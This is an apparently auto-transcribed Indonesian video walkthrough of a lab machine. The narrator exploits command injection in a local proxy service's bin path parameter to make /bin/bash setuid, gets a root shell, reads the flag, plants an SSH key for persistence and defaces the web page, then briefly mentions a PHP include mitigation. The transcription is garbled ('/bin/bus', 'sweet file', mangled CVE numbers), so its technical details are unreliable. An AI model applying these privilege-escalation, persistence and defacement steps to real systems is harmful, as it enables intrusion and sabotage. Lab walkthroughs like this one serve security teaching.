port 33211 ini ke tempat kita. Oke, ini akan sedikit lebih berat. Coba kita cek dulu, tadi kita melakukan sudo min L
ada class first services. Mari kita coba lihat di sini, kita cari tahu apakah ada exploit publik, exploit GitHub, local privilege escalation. Nah, di sini ada CVE 2025 port ini has been identified in class first revision versi 223. This vulnerability default installation of class first service. Nah, di sini ada start class. The exploit allow you the local USR slash to allow a local user to submit arbitrary bin path parameter the slash class ini. Mari kita coba lihat, sepertinya ada parameternya di CVE ini. Mari kita coba lihat CVE nya aja. CVE 2000 ini POC GitHub. Nah, di sini ada orang juga yang melakukannya. Mari kita coba buka salah satunya, POC-nya itu seperti apa. Constant listed port. Oh, ini portnya juga ada. Core manager, warp API services, ordinary API start class, API stop class, start service, get class, dan exit start. Oke. PID spawn prosesnya. Terus kita coba di sini exchange URL bin 4 application JSON, terus log file temp.exe, bin 4 nya itu home user found, config directory-nya /tmp, config filenya itu /dev null, log file /tmp slash. Nah, untuk melakukan command injection-nya di mana ya? Oh, home found ini adalah command injection. Oke, jadi kita bisa melakukan bin path ini untuk melakukan command injection. Oke, jadi di sini kita akan coba ls-a, jadi kita tidak ada apa-apa di sini. Kita coba clear. Jadi di sini saya akan coba bikin satu theme exploit. Theme tidak ada, jadi saya akan menggunakan nano exploit. Di sini kita akan coba melakukan satu slash shebang menggunakan script bash untuk melakukan chmod plus s slash bin slash bash. Terus kita kontrol X, yes, dan enter. Nah, baru kita lakukan chmod plus x si exploit. Nah, jadi kita sudah ada exploitnya itu berupa seperti ini ya. Dan ls-a exploit kita itu sudah bisa dieksekusi. Nah, kita akan melakukan si URL ke 127.10 start class min 4 home user. Mari kita coba copy ini, terus kita coba pastikan di sini, dan kita cuman perlu merubah si usernya. Si usernya ini kita coba arahkan ke home. User kita itu adalah wall, dan kita akan coba melancarkan exploit. Dan oke, dan saya coba hapus dulu ini aja deh biar kelihatan script kita itu in one long side script. Takutnya ada yang putus-putus ya. Jadi dia menggunakan data /bin /path bin path itu exploit, dan menggunakan content type application JSON untuk mengakses ke folder start class. Oke, saya akan coba Ctrl C dulu di sini, dan saya coba ls-a/bin /bash. Di sini kita belum ada suite filenya, tapi kita akan mencoba menggunakan exploit ini untuk menjalankan /bin /bash dari si URL untuk ke
exploit ini kita coba copy. Mana kopinya? Kok nggak mau sih copy loh, aku cuma mau copy selection aja. Kita Ctrl Shift V dan coba kita enter. URL bad missing format or missing URL. Why? Apakah karena ada Ctrl C di sini? Oh no. Mari kita coba benerin. Saya akan coba Ctrl Shift T, terus saya coba buka Visual Studio Code di sini. Mungkin ada karakter yang salah ya. Saya akan coba bikin satu file payload. Ctrl V. Oh iya, ada Ctrl C-nya di sini. Oke, coba kita copy ini, Ctrl C. Lalu kita coba pastikan di sini. Nanti ada karakter URL missing ini, jadi dia nggak tahu apa-apa. Oke, coba kita enter. The request content type is not supported URL using bad or missing URL. Apakah karena kita copy paste ya? Tapi kita harusnya sudah copy paste di sini. Mari kita coba URL-nya kita encode pakai ini. Dan oh, di sini ada kehilangan min h header. Content type-nya itu application JSON, min d-nya itu ini home exploit URL tam. Dan mari kita coba copy ulang dan coba kita Ctrl Shift V kembali dan kita coba enter. Code 0. Message oke, datanya 0. Sekarang kita coba lihat ls-min/bin/bus. Nah, sekarang sudah kita lihat perbedaannya. /bin/bus di sini dia tidak ada s, sekarang sudah ada s, atau yang sering disebut dengan sweet file. Untuk mendapatkan privilege escalation sebagai root, kita bisa menjalankan /bin/bus min p, dan coba kita lihat di sini ID. Kita sudah mendapatkan efektif group ID sebagai root dan efektif user ID sebagai root. Dan kita bisa cd/root dan kita bisa ls-min/la. Kita bisa lihat rows ini. Kita coba cat rows-nya dan kita sudah mendapatkan flag-nya di sini. Kita sudah mendapatkan juga cd.ssh ls-min/la. Tidak ada apa-apa, kita bisa bikin di sini satu SSH das keygen min f test min f wallroot, enter dan kita coba ls-min/la. Sekarang sudah ada wallroot di sini. Kita bisa copy atau cat cat wallroot.pub. Wow, cukup panjang ya. Kita arahkan dia ke authorize key underscore keys. Coba kita cat authorize keys. Sudah ada si grid wall-nya dan kita coba ls-min/a di sini. Dan coba kita cat si wallroot ID RSA-nya ini. Dan kita coba lakukan ini dari luar lagi. Copy bagian private key-nya, copy. Dan coba kita bikin di Visual Studio Code saja. Di sini kita bikin satu file root underscore wall. Kita pastikan di sini. Pastikan dia ada 2, enter. Sekarang kita coba SSH min i root wall root at 192.168.11.100 unprotected private key file. Oke, berarti kita Ctrl C, terus kita coba chmod 600. Saya coba besarin root wall
Kalau kita coba ulang lagi, dan kita sudah sebagai root full ITTY root akses. Kalau di sini kita cuman rootnya itu cuman ID, cuman sebagai efektif UID. Di sini kita sudah sebagai UID-nya langsung sebagai si root. Oke. Kita bisa ls-la di sini dan kita bisa lihat config-config apa-apa saja, dan kita sudah mempunyai privilege tertinggi di sistem Linux-nya, dan kita bisa melakukan ponet. Nah, jadi kita sudah bisa memponet satu website di sini. Kita bisa cd/var www.html, dan kita bisa ls-la di sini index.php-nya tadi yang itu kita bisa backup index.php-nya ke index.php_back, dan kita coba bikin di sini satu file echo. Kita akan coba bikin satu pemberitahuan kepada si yang punya server bahwa kita bisa lakukan ini ke dalam satu file yang disebut dengan index.html. Nah, coba kita lihat di sini websitenya tadi yang ini. Mari kita coba akses IP-nya lagi. Your system not secure. Loh, kok ada mv bug ini? We can get your system. Echo. Loh, why? Oh no. Nano index.html. Oh, ini dianggap sebagai komen tadi berarti ya. Oke. Ctrl X, yes, enter, dan kita coba refresh. Oke, sampai di sini video kita. Saya harap Anda cuma bisa belajar bahwa kerentanan yang kecil saja yang tadi kita lihat dari index.php-nya itu yang kita bisa baca di sini cat index.php. Yang bugnya tadi itu cuman kesalahan kecil dari include index.php ini aja yang bisa dia sangat berbahaya. Ya, ini bisa kita cegah dengan PHP modulnya mungkin bisa dimatiin untuk include PHP URL include-nya bisa dimatiin, di turn off dari PHP infect-nya. Nah, ini bisa kita turn off di sini ya. Jadi sampai di sini saja video saya. Terima kasih apabila berguna buat Anda. Jangan lupa untuk klik like dan subscribe-nya untuk saya dapat memberikan pelajaran yang selanjutnya. Sampai di sini dan bye bye.